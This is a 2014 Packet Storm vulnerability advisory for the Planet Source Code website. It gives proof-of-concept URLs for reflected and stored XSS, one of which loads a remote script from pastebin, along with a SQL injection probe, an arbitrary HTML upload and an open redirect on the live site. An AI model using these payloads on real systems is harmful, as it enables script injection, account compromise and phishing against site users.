Planet Source Code XSS / SQL Injection / Shell Upload

2014-11-16T00:00:00
ID PACKETSTORM:129130
Type packetstorm
Reporter DevilScreaM
Modified 2014-11-16T00:00:00

Description

                                        
                                            `#Title : Planet Source Code - Multiple Vulnerabilities  
#Author : DevilScreaM  
#Date : 15 November 2014  
#Category : Web Applications  
#Vendor : http://planet-source-code.com  
#Greetz : newbie-security.or.id | Indonesian Security  
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber | Madleets  
  
============================================================================================  
  
Remote Cross Site Scripting  
Location : vb/scripts/BrowseCategoryOrSearchResults.asp  
Parameter : txtCriteria  
  
Reference : https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet  
  
POC :  
http://planet-source-code.com/vb/scripts/BrowseCategoryOrSearchResults.asp?txtCriteria=[XSS+BYPASS_FILTERING]  
  
Example :  
http://planet-source-code.com/vb/scripts/BrowseCategoryOrSearchResults.asp?txtCriteria="><SCRIPT/SRC="http://pastebin.com/raw.php?i=sUHjCcQ1"></SCRIPT>  
  
===========================================================================================  
  
Stored Cross Site Scripting  
  
POC :  
  
1. You Must Register or Login to Planet-Source-Code  
2. After Login, Go to Link :  
http://planet-source-code.com/vb/jobs/PostJob.asp?lngWId=8  
  
Input your Script Cross Site Scripting at Textbox Job Title,Company,Description  
  
3. View your Cross Script Scripting at :  
http://planet-source-code.com/vb/jobs/ListJobs.asp  
  
=============================================================================================  
  
Cross Site Scripting  
  
Location : vb/scripts/voting/VoteLog.asp  
Parameter : txtCodeName  
  
POC :  
http://planet-source-code.com/vb/scripts/voting/VoteLog.asp?intUserRatingTotal=&lngWid=10&txtCodeName=[YOUR_XSS]&txtCodeId=9431&intNumOfUserRatings=0  
  
Example :  
http://planet-source-code.com/vb/scripts/voting/VoteLog.asp?intUserRatingTotal=&lngWid=10&txtCodeName=<script>alert("DevilScreaM")</script>&txtCodeId=9431&intNumOfUserRatings=0  
  
===============================================================================================  
  
Possible SQL Injection  
  
Location : vb/jobs/ListJobs.asp  
Parameter : txtMaxNumberOfEntriesPerPage  
  
POC :  
http://planet-source-code.com/vb/jobs/ListJobs.asp?txtMaxNumberOfEntriesPerPage=10'  
  
================================================================================================  
  
Arbitrary File Upload  
  
POC :  
  
1. You Must Register or Login to Planet Source Code  
2. After Login, Go to Link  
http://planet-source-code.com/vb/authors/new_author_login.asp?lngWId=1&blnExisistingAuthor=TRUE  
  
3. Upload your File TXT or HTML in Upload Button  
4. After Upload File, see your file at :  
http://planet-source-code.com/Upload_PSC/AuthorPhotos/[RANDOME_NAME].html  
  
Example :  
http://planet-source-code.com/Upload_PSC/AuthorPhotos/AUTHOR_PHOTO201411151232354597.html  
  
=====================================================================================================  
  
URL Redirection  
  
POC :  
http://planet-source-code.com/vb/authentication/DeleteCookies.asp?txtReturnURL=[URL]  
  
Example :  
  
http://planet-source-code.com/vb/authentication/DeleteCookies.asp?txtReturnURL=http://newbie-security.or.id/  
`